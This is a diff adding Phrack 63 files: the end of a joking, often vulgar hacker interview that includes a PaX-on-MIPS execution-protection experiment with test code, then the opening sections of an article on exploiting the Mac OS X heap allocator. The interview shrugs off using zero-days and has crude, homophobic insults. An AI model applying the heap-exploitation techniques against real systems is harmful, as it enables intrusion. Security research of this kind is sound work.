+		  . A Philosophical Companion to First-Order Logic,
+		    hughes (english, by R.I.G.);
+		  . Freedom and Organization 1814-1914, russel (english,
+		    by Routledge);
+		  . Ethica, spinoza (english, by Hafner);
+		  . Gdel's Proof, nagel & newman (english, by NYU);
+		  . Zur Genealogie der Moral, nietzsche (english, by
+		    Douglas Smith);
+		  . Theory of Matrices, perils (englisn, by Dover,
+		    1958-1991);
+		  . Modern Algebra, warner (english, by Dover,
+		    1965-1990);
+		  . Security Assessment: Case Studies for Implementing
+		    the NSA -- National Symposium of Albatri;
+            Urls: www.petiteteenager.com
+          I like: HUHU'ing                     
+       I dislike: not HUHU'ing                 
+                                                                                
+ |=---=[ Life in 3 sentences                                                    
+                                                                                
+ DG = DH - TDS
+                                                                                
+ |=---=[ Passions | What makes you tick                                        
+
+ Too complex to be described with a set of words: totally undecidable;
+ cannot be solved by any algorithm whatsover -- equivalently, english,
+ portuguese, .... Cannot be recognized by a Turing Machine, of which
+ should halt for any input...
+
+ ... but for coconuts!
+                                                                                
+ |=---=[ Which research have you done or which one gave you the most fun?       
+
+ Anything that made me stop and, extra-ordinarily, question the extra-ordinary.
+
+ |=---=[ Memorable Experiences                                                  
+
+ Going against my family and staying at the computer through nights.
+ Having this to allow me to have fun and feel pain. Looking for the
+ utopic job. Going to south Brazil, Mexico, and northeast Brazil to find
+ it. Meeting the people I have met through this quest, seeing the
+ history I have seen passing in front of my eyes in every place I
+ stepped. Being drunk, being sober, falling down and off. Getting
+ fucking up and HUHU'ing again. And again.
+ 
+ Feeling, being cold, believing and being agnostic. Fighting. Getting girls
+ for the pleasure and falling apart for theirs. Prank-calling, chopp-touring,
+ writing, counting. Stopping.
+ 
+ Looking for sharks, surfing, breaking my phusei-self. Going and
+ bringging others into this.
+ 
+ Being.
+
+ |=---=[ Quotes                                                                 
+ 
+ . HUHU
+ . \o/
+ . /o\
+ . wish I was dead so I could be happy and safe!
+ . \o\
+ . q:D
+ . :S
+ . you better call someone smart!
+ . \o\
+ . :/
+ . I'd rather have 300 beers a month than a formal education
+ . /o/
+ . <3
+
+ |=---=[ Open Interview - General boring questions                              
+ 
+ Q: What was your first contact with computers?
+ A: Since really young I used to go to my grandparents' on the weekends.
+ When I was 8 I started having some fun by sniffing around my uncle's
+ electronic lab located at the back side of his room (the guy was an
+ electronic eng. grad. student at the time). Fetching experiences
+ from the subject I can tell I used to go crazy about the place --
+ serio. From encyclopedias, through pieces of plastic, ending in
+ broken VCR's and widely exposed TV's. In certain saturday of my 11's
+ there was little tiago playing around that room: I can clearly
+ remember climbing (theo style) the closet, looking for fun objects,
+ when I faced this box; I took it, I opened it, I faced a computer.
+ Assembled by some brazilian manufactor, there was the CP200 with a
+ board based on a Z80A CORE. There was tiago huhu'ing around because
+ of that piece of fancyness. It lasted for exact 3 months, till the
+ day the tape that was responsable for connecting the keyboard to the
+ main board got screwd; ripped -- R.I.P. 3 months were enough for
+ playing around with basic BASIC and abstracting that new fancy
+ stuff. The time went through and I haven't had the possibility of
+ having a computer again. In january 1996 I went to Sao Paulo, kids
+ vacations you know. I stood with an uncle whom had this company of
+ which had some DOS based machines, maintained by this Clipper
+ programmer. I remember perfectly being "taught" how to turn on the
+ computer an press the keys. Very few time after this moment I was
+ being introduced to this very fancy toy known as PCTools -- anyone?
+ Yes, there was 15 year old tiago, who could barely turn on that
+ thing, giving his first steps on reverse engineering. 15 days, that
+ was the exact time of my exposition to the environment. Again, no
+ more computers. August 1999, dad arrives home with a Packard Bell
+ station. It was a Pentium MMX at 166MHz, with the amount of 16MB of
+ RAM, and a 3.1GB IBM hard disk. Not just that, it had multimedia
+ fancyness and the great thing known as modem. It carried, and was
+ being carried by, a Windows 98 operating system. Wow! tiago had his
+ first modern computer. Yes. But wait, where is my black screen full
+ of unintelligible numbers written on green letters?! Fuck this!
+ Frustration... time.. Internet! time.. ICQ! time ... IRC, #hacking.
+ "yo, click start menu, execute. Now type: telnet huhu.fancyworld.net
+ 1470" -- orgasm --. It happened till the day I questioned what those
+ sequence of magical pressed-keys actually meant. And then it
+ began... HUUUU! coding! HUHUHUHHUHHUHUHUHUHUHUHUHUHUHUHUHUHUHU
+ HUHUHUHUHUHU :D:D:D q:D \o/ \o\ /o/ /o/ /o\ \o/
+ But yeah, that crazy image of a bunch of green code in a dark screen
+ never went out of my mind, I needed to go lower-level... and so I
+ went, and keep on going, to never reach, to never end.
+ 
+    Wait, I would like to make a comment out of the belou, kthx: there
+    is no point to writting zero-day if you are not going to use it!
+    I'm welcome.
+
+ Q: What was your first contact with computer security and how important
+ for you is computer security relative to your interest in computers in
+ general?
+ A: In the end of the above story. After that I've met some other
+ coconuts who have been responsable for my first real adventures in
+ security. That was the real kick: reading phrack and going HUHU,
+ reading code, not having a damn clue of what it was doing, and being
+ days awake till I could get the mininum insight. Getting bored of the
+ "usual" things, giving the finger to the "common games" and comming to
+ play in whatever I pleased.
+ How important? It transformed me into a new form of coconut.
+ 
+ Q: Being relatively seperate from the "scene" in general, what was your
+ opinion on the concept of "the scene" and was your distance from this
+ concept (that may possibly exist) deliberate or not?
+ A: As I see, it is just another society around there.
+ As the "getting into it" was happening, I tended to get more and more
+ detached from this so called "scene". My being was thrown aside by the
+ scene. All I wanted was to sit down and hack. I couldn't digest it and
+ it couldn't digest my self. I sat back, I played, I watched you guys.
+                                                                                
+ Q: Actually isn't the whole current concept of "scene" a big load of
+ social correlation and acceptability bullshit?
+ A: It is "normal"; expected. Nothing that I don't see when I go to the
+ bakery or to a club with friends. People "look", people perceive,
+ people infer -- people judge based on their a priori context.
+ What in the hell am I doing?
+ 
+ Q: What do you think of Phrack magazine?  Do you think it should be
+ "resurrected" or continued to be maintained?  If so, do you think it
+ should change themes in any way (since many suggest that phrack is no
+ longer a magazine for hackers but some bullshit academic fame making
+ fluff for the computer security industry)?  Would you rather see a
+ Phrack that exclusively published movie reviews and cooking tips?
+ A: It was responsable for many HU's bumping inside my head. I jumped, I
+ got pissed, injuried and healthy. It gave me inputs, it drove me to
+ many outputs, where all the results in between these events were
+ responsable for keeping this coconut going on. Going on is the point,
+ why to stop it? I was getting bored of the articles, yes. But I believe
+ this is more for my personal changes than actually the magazine's.
+ However, I see some big tendency of articles (as a reflection of the
+ scene) converging always to the same place and getting stuck there, in
+ a boring iteration that never ends. I've played with Linux's execution
+ environment and the technical specs linked to it, but then I went to
+ something else -- this being the same game, now with PalmOS or simply
+ going play with Optimization, Obfuscation, or to hack the IrDA's driver
+ of my laptop. How can people write articles on what you call "shellcodes"
+ for every single computer architecture, operating system, supported
+ ABI's, supported ISA's, or whatever? Isn't that just a matter of
+ getting manuals? Why to dissert about the ELF format file and the
+ dynamic linking system of some specific plataform without any
+ "improvement" (take this as a big boom, I don't think it's worth to
+ define the term here) in a "hacking technique"? I think that is what
+ sucks in phrack nowadays. About the academic style, I have problems
+ with formalism myself. Something what I really appreciate in phrack,
+ for instance, is this mid-level formalism when compared to the academy.
+ I believe it is very interesting the fact that you can submit a
+ compilation of techniques with some basic scraps about it, in a
+ non-defined format or dissertative way. If people behind it think the
+ content is good, it will make it. Though, I also think that the minimum
+ formalism is necessary, otherwise it gives excessive room for nonsense
+ to be exposed, and I don't think it is cool for people to read
+ "Assembly HOW-TO's" that "teach" you the usage of some "instructions",
+ for some specific plataform, in some very restricted context and make
+ the reader to believe they understand about that universe.
+ About fame: unfair but expected -- feel like vomiting whenever I think
+ of myths, however if I re-gurgitate myths will deliberately be pulled
+ out, as gastric ulcer, of my very self.
+ I would love to see a review of the /home/PORNO/ collection, indeed.
+ And I really expect to be having some dope french food till the end of
+ the year, yes.
+ 
+ Q: What do you have to say about that whitehat/blackhat opposition that
+ gained more attention in the last years and what do you reply to those
+ people calling you a whitehat because one of your project was about
+ porting PaX?
+ A: How would I get called if I was running in circles and blubbering
+ whilst wearing an orange suit? Teletubbie?
+
+ Q: How would you qualify the hacking underground in 2005? Many people
+ think there is no more underground because of all the commercial
+ bullshit around security. Any comments?
+ A: I believe thinking about this is an act of oblivion. You might be
+ able to determine several characteristics and classify the pros and
+ cons of the process. Though, as the process' development gets strongger
+ its transformation power increases as well, thus the number of
+ "ideal-branches" within this social group tend to increase and react
+ between themselves. How are Montmartre and Montparnasse nowadays?
+
+ Q: Who are your heroes of computer security, and why?
+ A: I have many, serio -- and I'm a lucky bastard for being able to
+ meet/know many of them. But what difference would it really make if I
+ told you? The heroes are mine, the fucking myths are mine.
+
+   Can I make a question myself? kthx.
+
+   Q: Coxinha+guarana or Exchange 0-day?
+   A:
+
+ Q: How do you define the term "hacker"?
+ A: I believe symbolic references determine a "fact". A linguistic
+ representation of someone's type of reality, at certain time. As the
+ Being of that being changes, so does its perception about that fact.
+ When beings as such, or even as Nothing, interact, entropy increases
+ and the fact tends to get more deformed. The technicism helps the
+ process, as information media get more powerful and globally spread.
+ Consumate Nihilism. I believe.
+
+ Q: Come on, 'fess up. You're brazillian after all, so name all the
+ sites you've defaced.
+ A: HAPPY BIRTHDAAAAAAAY!!!!!!!!!!!!!!!1
+
+ Q: If you were having sex with route, would you be the top or bottom?
+ A: I would try both. I would try others. Though I would really just be
+ interested in the muscles, tattoos and guns :D
+ 
+ Q.1: We hear you're the guy who schooled pageexec@freemail.hu on PaX.
+ Is this true? Explain.
+ Q.2: What was your motivation in porting PaX to MIPS, what were the
+ biggest problems you encountered and how did you resolve them?
+ A: Schooled? I don't think so :>. There is this story about the
+ impossibility of PAGEEXEC on MIPS based computers, initiated by the
+ great Theoretical de Raadt {[1],[2]}.
+ Motivation: I simply thought it would be fun to try to prove it wrong
+ and started playing around. In the end, I just found out I was the
+ wrong one. For now at least :>
+
+ 
+ [Warning]
+ 
+ I'd like to advise that I'm DRUNK, at Bulas's, having a great party in
+ the name of Tango's bday: happy bday, Tango!!! No aids, bro ;> just
+ beerz and cheerz!
+
+
+ [First approach]
+ 
+ Trying to play with caching system. Failed.
+
+
+ [From Linux-MIPS mailing list]
+ 
+ "PAX can't be fully supported on MIPS anyway; the architecture doesn't
+ have a no-exec flag in it's pages. PAX docs are bullshit btw.
+ execution proection doesn't require a split TLB and anyway, the MIPS
+ uTLBs are split." -- Ralf
+ 
+
+ [Response] (despite the fact that Ralf, one of my fancy germans, missed
+             the entire point of the PaX project)
+	     
+ I see that MIPS has split TLB's, which can not be distinguished by
+ software level, in another hand. Thus when a page-fault occours I don't
+ see how a piece of (non-microcoded) exception handler can get aware
+ whether the I-Fetch is being done in original ``code area'' or as an
+ attempt to execute injected payload in a memory area supposed to carry
+ only readable/writeable data. Plus the fact that JTLB holds references
+ to data and code together in the address translation cache. Plus
+ situations like kseg0 and kseg1 unmaped translations, which would
+ occour outside of any TLB (having virtual address subtracted by
+ 0x80000000 and 0xA0000000 respectively to get physiscal locations)
+ making, as you mentioned, only split uTLB's (not counting kseg2 special
+ case). But PaX wants to take care of kernel level security too.
+ Even MIPS split cache unities (which can be probed separately by
+ software) wouldn't make the approach possible since if you have a piece
+ of data previously cached in D-Cache (load/store) the cache line would
+ need to suffer an invalidation and the context to be saved in the
+ I-Cache before the I-Fetch pipe stage succeeds.
+
+ Indeed, execution protection (in a general way) does not require split
+ TLB. Other solutions designed and implemented by PaX are SEGMEXEC
+ (using specific segmentation features of x86 basead core's) and
+ MPROTECT. The last one uses vm_flags to control every memory mapping's
+ state, ensuring that these never hold VM_WRITE | VM_MAYWRITE together
+ with VM_EXEC | VM_MAYEXEC. But as the solution becomes more complex it
+ also tends to get more issues. First of all, this wouldn't be as simple
+ and ``automatic'' as per page control. Another point is that this
+ solution wouldn't prevent kernel level attacks so, among others, any
+ compromise in this level could lead to direct manipulation of a task's
+ mappings flags. At the end a known problem is an attacker who is able
+ to write to the filesystem and to request this file to be mapped in
+ memory as PROT_EXEC. In other words: yes it is possible to achieve
+ execution protection in other ways, but not as precise as page-level.
+ 
+ 
+ [Second approach]
+
+ "Plus the fact that JTLB holds references to data and code together in
+ the address translation cache." went from a problem to a solution, when
+ discussing it to PaX team.
+
+
+ The quote:
+
+ "Multiple Matches: If more than one entry in the TLB matches the
+ virtual address being translated, the operation is undefined." -- from
+ [3].
+
+
+ The algorithm:
+
+ - from the Refill exception handler, check fetching type {
+     * _EPC = EPC;
+     * if CP0(Cause(BD)) [
+         . _EPC += 4;
+     ]
+     * compare ( CP0(_EPC) , CP0(BadVaddr) ) [
+         . if TRUE  ( I-Fetch );
+	 . else     ( D-Fetch );
+     ]
+
+     * I-Fetch [
+         . build the valid PTE and load it normally in the J-TLB;
+     ]
+     * D-Fetch [
+         . build a valid PTE and load it in the J-TLB;
+	 . force it to be loaded in our lovely entry in the D-TLB (
+
+	     __asm__ __volatile__ ("lw %0,0(%1)"\
+	                       : "=r" (user_data)\
+			       : "r"  (address));
+         )
+	 . build an invalid PTE, for the same ASID/VPN, marked by PaX (
+
+	     static inline pte_t pte_mkpax(pte_t pte)
+	     {
+                  pte_val(pte) &= ~(_PAGE_READ|_PAGE_SILENT_READ|_PAGE_DIRTY);
+             }
+
+	 )
+	 . load the invalid entry in the J-TLB
+     ]
+ }
+ 
+
+ The conjecture:
+
+  If a I-Fetch happens to that (previously marked by PaX) page, the
+  circuit's TLB sorting algorithm should take the invalidated entry from
+  J-TLB, load it within the I-TLB and generate a second page fault by
+  trying to make use of this entry.
+ 
+ - from the Refill exception handler, check fetching type {
+     * _EPC = EPC;
+     * if CP0(Cause(BD)) [
+         . _EPC += 4;
+     ]
+     * compare ( CP0(_EPC) , CP0(BadVaddr) ) [
+         . if TRUE  ( I-Fetch );
+	 . else     ( D-Fetch );
+     ]
+
+     * I-Fetch [
+         . for PaX marked pages (
+	     pax_report_fault(...);
+	     do_exit(SIGKILL);
+	 )
+	 . for non PaX pages, build the valid PTE and load it normally
+	   in the J-TLB;
+     ]
+ }
+ 
+ 
+ [The experiment] 
+ 
+ The computer:
+ 
+  IDT 79RV4600-100, 128MB of RAM.
+ 
+ 
+ - Executive code {
+     * play with CP0(Index);
+     * play with CP0(EntryLo)'s flags;
+     * play with CP0(Wired);
+ }
+ - Dump the Translation Lookaside Buffer entries to disk {
+     * look for patterns;
+ }
+ 
+
+ The user code:
+
+   #include <stdio.h>
+   #include <unistd.h>
+   #include <stdlib.h>
+   #include <fcntl.h>
+   #include <sys/mman.h>
+   #include <asm/page.h>
+
+
+
+                                        /* jr $31 ; nop */
+   const unsigned long	payload[] = { 0x03e00008, 0x00000000 };
+
+
+   int
+   main(int argc, char **argv)
+   {
+   	unsigned long	page,
+			vpn;
+	void		*vaddr;
+	int		fd;
+
+
+	/* mmap itself won't load/store the page, which means a virgin
+	 * place so we can be the fault's EPC.
+	 */
+	if (argv[1]) {
+		fd = open(argv[1],O_RDWR);
+		vaddr =  mmap(0, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE,\
+				MAP_PRIVATE, fd, 0);
+	} else {
+		/* malloc's internals stores then loads somewhere in
+		 * the page range, it will generate our fault.
+		 */
+
+		/* This is ridiculous, but MIPS glibc's
+		 * does brk(PAGE_SIZE * 33) even if you
+		 * just want to malloc(few bytes), normally you get:
+		 * -> brk (0x10001000 + (PAGE_SIZE * 33))
+		 * 
+		 * If malloc requested size > 33 pages then it old_mmap
+		 * PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS
+		 *
+		 * Even funnier cause as far as I can tell glibc
+		 * assumes size >= 32 (instead of 33) to then
+		 * get_unmapped_area....
+		 *
+		 * Thinking about the whole MIPS architecute i can't
+		 * think of anything that could justify this crap.
+		 */
+		vaddr = malloc (33 * PAGE_SIZE);
+		memcpy(vaddr, (void *) payload, 8);
+	}
+
+	page = ((unsigned long) vaddr & (PAGE_MASK));
+	vpn  = ((unsigned long) vaddr & (PAGE_MASK << 1));
+
+
+	printf("Payload   @    %08lx\n", (unsigned long) vaddr);
+	printf("CP0_BADVADDR : %08lx [VPN = %08lx]\n\n", (page+8), vpn);
+
+	/* I-Fetch vaddr */
+	asm(
+		"or	$8,$2,$3\n"
+		"jalr	$8\n"
+	: : "r" (page), "r" (((unsigned long) vaddr & ~(PAGE_MASK)))
+	);
+
+	return	page;
+   }
+
+
+ [The results]
+
+ Patterns:
+ 
+ No pattern. Sorting algorithm seems undecidable from the software
+ interface.
+ 
+ 
+ - Output example {
+
+     surreal kernel: ######################################################
+     surreal kernel: [do_page_fault] : Program      : Hello [3218]
+     surreal kernel: [do_page_fault] : CP0_BADVADDR : 2aac3004
+     surreal kernel: [do_page_fault] : EPC          : 2ab90928
+     surreal kernel:   ---> TLBS Exception   (1000ffdb)
+     surreal kernel:
+     surreal kernel: ------------------------[BEFORE]---------------------
+     surreal kernel: [__update_tlb] :  Program      : Hello [3218]
+     surreal kernel: [__update_tlb] :  CP0_BADVADDR : 2aac3004
+     surreal kernel: [__update_tlb] :  ASID         : 00000062
+     surreal kernel: [__update_tlb] :  EntryHi      : 2aac2062
+     surreal kernel: [__update_tlb] :  EntryLo0     : 32565e
+     surreal kernel: [__update_tlb] :  EntryLo1     : 0
+     surreal kernel: [__update_tlb] :  Index        : 45
+     surreal kernel:
+     surreal kernel:           ---- TLB Entries ----
+      .............................................................
+     surreal kernel: Index: 45 pgmask=4kb va=2aac2000 asid=62
+     surreal kernel:    EntryLo0 : [pa=0c959000 c=3 d=1 v=1 g=0]
+     surreal kernel:    EntryLo1 : [pa=00000000 c=0 d=0 v=0 g=0]
+     surreal kernel:
+     surreal kernel: ------------------------[AFTER]----------------------
+     surreal kernel: [__update_tlb] :  Program      : Hello [3218]
+     surreal kernel: [__update_tlb] :  CP0_BADVADDR : 2aac3004 [00000000]
+     surreal kernel: [__update_tlb] :  ASID         : 00000062
+     surreal kernel: [__update_tlb] :  EntryHi      : 2aac2062
+     surreal kernel: [__update_tlb] :  EntryLo0     : 32565c
+     surreal kernel: [__update_tlb] :  EntryLo1     : 3297dc
+     surreal kernel: [__update_tlb] :  Index        : 47
+     surreal kernel:
+     surreal kernel:           ---- TLB Entries ----
+      .............................................................
+     surreal kernel: Index: 45 pgmask=4kb va=2aac2000 asid=62
+     surreal kernel:    EntryLo0 : [pa=0c959000 c=3 d=1 v=1 g=0]
+     surreal kernel:    EntryLo1 : [pa=0ca5f000 c=3 d=1 v=1 g=0]
+     surreal kernel:
+     surreal kernel: Index: 47 pgmask=4kb va=2aac2000 asid=62
+     surreal kernel:    EntryLo0 : [pa=0c959000 c=3 d=1 v=0 g=0]
+     surreal kernel:    EntryLo1 : [pa=0ca5f000 c=3 d=1 v=0 g=0]
+ }
+ - Working example {
+
+     tiago@surreal(~)$ ./Hello
+	 Payload   @    2aac3008
+	 CP0_BADVADDR : 2aac3008 [VPN = 2aac2000]
+
+	 Killed
+     tiago@surreal(~)$ uname -a
+	 Linux surreal 2.6.9-rc2 #125 Thu Oct 28 05:38:27 BRT 2004 mips unknown
+	 tiago@surreal(~)$
+
+      .............................................................
+
+     surreal kernel: ################## EXECUTION ATTEMPT #################
+     surreal kernel: [do_page_fault] : Program       : Hello [3218]
+     surreal kernel: [do_page_fault] : CP0_BADVADDR  : 2aac3008
+     surreal kernel: [do_page_fault] : EPC           : 2aac3008
+ }
+ - Possible reasons {
+     * timing;
+     * stupidity;
+     * ...;
+ }
+ 
+
+ So? Looking at some opencores.org's projects and checking their MMU
+ circuit implementations that might get me some ideas.
+ Ah! Yes, BTW, if you have the HDL project of the Stanford MIPS, or any
+ of its children, please hook me up -- warez. kthx.
+
+
+
+
+ [1] http://www.securityfocus.com/archive/1/333303/2003-08-09/2003-08-15/2
+ [2] http://cvs.openbsd.org/papers/auug04/mgp00009.html
+ [3] MIPS R4000 Microprocessor's User Manual, 2nd Ed. (p.62).
+ 
+ 
+ |=---=[ Open Interview - The real cool questions
+
+ Q: Is the true you still entertain relation with the KIQ team? what kind
+ of missions did you realised for them?
+ A: I hate soccer.
+
+ Q: How close is your personal relation with the scene whore halfdead?
+ tell us about .ro/.br gangbangs...
+ A: The hawk that is big?
+
+ Q: We heard mayhem is moving to your country escaping french fascist
+ laws, have you never tried ELFsh?
+ A: Hrmmm, in fact it's just a genius play from big local beuh dealers.
+ Guinness?
+
+ Q: You said 4times by the past after posting bullshit in dailydave,
+ you'll never do it again, but you are still posting. How do you live
+ that addiction? Any idea why noone reading that mailing list can't
+ understand a word of your philosofical ideas?
+ A: 4? I've said it 82 times.
+ I simply don't think of the subject, it's like having aids and being
+ concerned about it.
+ Are you nuts? I know for sure I'm the only retarded capable to
+ understand my symbolism ;P
+
+ Q: Coxinhaaaaa?
+ A: Bico
+
+ Q: About philosophy, why you ended in ITS world? There are rumors about
+ you talking to your computers about your philosophy and asking them to
+ comment before you post in dailydave?
+ A: See 'Life'. False! That's why they suck so much.
+
+ Q: Absynthe?
+ A: Sharks!
+
+ Q: Did you try to put some sense to your philosofical ideas _without_
+ any absynthe effect?
+ A: Bohmes, Dan Frank. <3
+
+ Q: Does the number of 'hu' has a signification for you?
+ A: Huhuhuhuhuhu hu huhuhu
+
+ Q: Is there any kind of relation between 'hu' and 'uh'?
+ A: Uh? Hu!
+ 
+ Q: Absynthe?
+ A: Spain
+
+ Q: Rumor has it that pax team strong-armed you into being his MIPS
+ bitch, any comments?
+ A: :< Not fair. I almost cried because of petite pip.
+
+ Q: How did your transition from inline skating to inline assembly come
+ about?
+ A: Sliding...
+
+ Q: Which would you say has bigger scenewhores, the hacking scene or the
+ X-games scene?
+ A: 540 into True-spin kind grind, fake 360 out.
+
+ Q: What does 'hu' actually mean?
+ A: Mean? :/
+
+ Q: What are your opinions on finger(1) ?
+ A: HUHUHUHUHU q:D
+
+ Q: Free [RaFa] ?
+ A: Sit on your feet
+
+ Q: Do you have anything to say to all the people scuttling around
+ trying to figure out who the fuck you are right now?
+ A: If they're really worried about that they should stop scuttling and
+ start blubbering instead.
+
+ Q: We would like to congratulate you on a succesful Phrack Prophile
+ defacement, and actually managing to get it distributed. How _did_ you
+ pull it off?
+ A: I didn't :D
+
+ Q: Can you answer a question with a paragraph less than 20 lines long?
+ A: No.
+
+ Q: Is your love of MIPS related at all to the 'Coyote & Road Runner'
+ cartoon?
+ A: "See MIPS Run"?
+
+ Q: I heard you're the funder of huhushmail ? Can you give us some light
+ about why Security through Obscurity actually works?
+ A: One of them, yes. I have to agree, though if I give you any
+ enlightenment I would be breaking the conecpt.
+
+ Q: Can you guess what will be your next answer?
+ A: No, but I know the question.
+
+ Q: Any idea why Phrack shouldn't be renamed Phcrack?
+ A: Because of current price of the blue mosquitos from Tanzania.
+
+ Q: CRUZEIROOOOOOO
+ A: Chupame la pija, boludo maricon!
+
+ Q: Which is the better backdoor?  PaX or grsecurity?
+ A: To be honest, I prefer the iGOBLIN backdooring technique.
+
+ Q: What percentage of this interview is inside humor, that the reading
+ audience will never understand?
+ A: 95.46008097%. I might get the graphical analysis soon, from the
+ widely known LRL -- Lance Research Laboratory. ;)
+
+ Q: How does it feel to be famous now?  How will this Prophile change
+ your life for the better?  For the worse?  Where can job recruiters
+ contact you?
+ A: I already got 83 phone calls, 68 fax messages, and 3 e-mails.
+ Invitations from all the fancy elite hacker groups. I might as well
+ apply to the NSA -- National Symposium of Albatri. I expect to be
+ capable of decreasing brazilian poverty and DDoS attacks with this, by
+ increasing the number of defacers that will bow down towards my
+ fancyness. I am also looking forward to becoming friends with all the
+ elite hackers and to be recognized as such. I will be beautiful,
+ famous, loved -- a super hero!
+ I'm welcome.
+
+ Q: DURA?
+ A: Hooray for Danny! *\o/*
+
+ Q: What are your thoughts on Richard Johnson of iDEFENSE?
+ A: Secure: never being a petit theft, he wears condoms!
+
+ Q: Do you have any idea why Richard Johnson of iDEFENSE has not killed
+ himself yet?
+ A: Lack of fancyness.
+
+ Q: Who is your favorite "hot shot hacker from Texas"?
+ A: The KoolKrazyKlantastic -- fluffi leona \o/
+ 
+ =---=[ One word comments                                                       
+                                                                                
+ [give a 1-word comment to each of the words on the left]                       
+                                                                                
+ WORD?                              : WORD!
+                                                                                
+                                                                                
+ |=---=[ Any suggestions/comments/flames to the scene and/or specific people?   
+ 
+ This bunch of bullshit spat above meant something when done. Fuck its
+ political meanings and implications, even though I cannot avoid them.
+ Carry on.
+ 
+ |=---=[ Shoutouts & Greetings                                                  
+ 
+ I don't believe in merit. To do is as arbitrary as to not do.
+
+ However, I want to HUG some people;
+ my family, my stag, my limey brother, my tukey, my albatross, my
+ creyss, my frogs, my dutchies, my hungarian, the only guy who's hotter
+ than the old apartment, my dot-pa-marine, my waismo, my joto, faggy,
+ my fancy blackhat white american, my kurdish, my corcho, my sweedish,
+ my boss, my tempest individuals, my metrosexual linguistic analystic
+ K-master giant, my iGOBLIN defender grin, my tibu, and AAALLLL my fancy
+ collection of fancy individuals!
+
+ |=[ EOF ]=---------------------------------------------------------------=|    
diff --git a/phrack63/5.txt b/phrack63/5.txt
new file mode 100644
index 0000000..e7b2001
--- /dev/null
+++ b/phrack63/5.txt
@@ -0,0 +1,1038 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3f, Phile #0x05 of 0x14
+
+
+|=---------------=[ OS X heap exploitation techniques  ]=---------------=|
+|=----------------------------------------------------------------------=|
+|=------------------=[ nemo <nemo@felinemenace.org> ]=------------------=|
+
+--[ Table of contents
+
+  1 - Introduction
+  2 - Overview of the Apple OS X userland heap implementation 
+    2.1 - Environment Variables
+    2.2 - Zones
+    2.3 - Blocks
+    2.4 - Heap initialization 
+  3 - A sample overflow 
+  4 - A real life example (WebKit)
+  5 - Miscellaneous
+    5.1 - Wrap-around Bug
+    5.2 - Double free()'s
+    5.3 - Beating ptrace()
+  6 - Conclusion
+  7 - References
+
+--[ 1 - Introduction.
+
+This article comes as a result of my experiences exploiting a heap 
+overflow in the default web browser (Safari) on Mac OS X. It assumes a 
+small amount of knowledge of PPC assembly. A reference for this has
+been provided in the references section below. (4). Also, knowledge of 
+other memory allocators will come in useful, however it's not necessarily
+needed. All code in this paper was compiled and tested on Mac OS X - 
+Tiger (10.4) running on PPC32 (power pc) architecture.
+
+--[ 2 - Overview of the Apple OS X userland heap implementation.
+
+The malloc() implementation found in Apple's Libc-391 and earlier (at the
+time of writing this) is written by Bertrand Serlet. It is a relatively 
+complex memory allocator made up of memory "zones", which are variable 
+size portions of virtual memory, and "blocks", which are allocated from 
+within these zones. It is possible to have multiple zones, however most 
+applications tend to stick to just using the default zone. 
+
+So far this memory allocator is used in all releases of OS X so far. It 
+is also used by the Open Darwin project [8] on x86 architecture, however 
+this isn't covered in the paper. 
+
+The source for the implementation of the Apple malloc() is available from
+[6]. (The current version of the source at the time of writing this is 
+10.4.1).
+
+To access it you need to be a member of the ADC, which is free to sign up.
+(or if you can't be bothered signing up use the login/password from 
+Bug Me Not [7]  ;)
+
+----[ 2.1 - Environment Variables.
+
+A series of environment variables can be set, to modify the behavior of
+the memory allocation functions. These can be seen by setting the 
+"MallocHelp" variable, and then calling the malloc() function. They are 
+also shown in the malloc() manpage. 
+
+We will now look at the variables which are of the most use to us when 
+exploiting an overflow.
+
+[ MallocStackLogging ] -:-  When this variable is set a record is kept of
+all the malloc operations that occur. With this variable set the "leaks" 
+tool can be used to search a processes memory for malloc()'ed buffers 
+which are unreferenced.
+
+[ MallocStackLoggingNoCompact ] -:- When this variable is set, the record
+of malloc operation is kept in a manner in which the "malloc_history" 
+tool is able to parse. The malloc_history tool is used to list the 
+allocations and deallocations which have been performed by the process.
+
+[ MallocPreScribble ] -:- This environment variable, can be used to fill 
+memory which has been allocated with 0xaa. This can be useful to easily 
+see where buffers are located in memory. It can also be useful when 
+scripting gdb to investigate the heap.
+
+[ MallocScribble ] -:-  This variable is used to fill de-allocated 
+memory with 0x55. This, like MallocPreScribble is useful for 
+making it easier to inspect the memory layout. Also this will make 
+a program more likely to crash when it's accessing data it's not supposed
+to.
+
+[ MallocBadFreeAbort ] -:- This variable causes a SIGABRT to be sent to 
+the program when a pointer is passed to free() which is not listed as 
+allocated. This can be useful to halt execution at the exact point an 
+error occurred in order to assess what has happened.
+
+NOTE: The "heap" tool can be used to inspect the current heap of a 
+process the Zones are displayed as well as any objects which are 
+currently allocated. This tool can be used without setting an 
+environment variable.
+
+----[ 2.2 - Zones.
+
+A single zone can be thought of a single heap. When the zone is destroyed
+all the blocks allocated within it are free()'ed. Zones allow blocks with 
+similar attributes to be placed together. The zone itself is described by
+a malloc_zone_t struct (defined in /usr/include/malloc.h) which is shown 
+below:
+
+ [malloc_zone_t struct]
+
+typedef struct _malloc_zone_t {
+
+    /* Only zone implementors should depend on the layout of this 
+    structure; Regular callers should use the access functions below */
+    void        *reserved1;     /* RESERVED FOR CFAllocator DO NOT USE */
+    void        *reserved2;     /* RESERVED FOR CFAllocator DO NOT USE */
+    size_t      (*size)(struct _malloc_zone_t *zone, const void *ptr); 
+    void        *(*malloc)(struct _malloc_zone_t *zone, size_t size);
+    void        *(*calloc)(struct _malloc_zone_t *zone, size_t num_items, 
+		           size_t size); 
+    void        *(*valloc)(struct _malloc_zone_t *zone, size_t size); 
+    void        (*free)(struct _malloc_zone_t *zone, void *ptr);
+    void        *(*realloc)(struct _malloc_zone_t *zone, void *ptr, 
+							size_t size);
+    void        (*destroy)(struct _malloc_zone_t *zone); 
+    const char  *zone_name;
+
+    /* Optional batch callbacks; these may be NULL */
+    unsigned    (*batch_malloc)(struct _malloc_zone_t *zone, size_t size, 
+				void **results, unsigned num_requested); 
+    void        (*batch_free)(struct _malloc_zone_t *zone, 
+			void **to_be_freed, unsigned num_to_be_freed); 
+    struct malloc_introspection_t       *introspect;
+    unsigned    version;
+} malloc_zone_t;
+
+(Well, technically zones are scalable szone_t structs, however the first 
+element of a szone_t struct consists of a malloc_zone_t struct. This 
+struct is the most important for us to be familiar with to exploit heap 
+bugs using the method shown in this paper.)
+
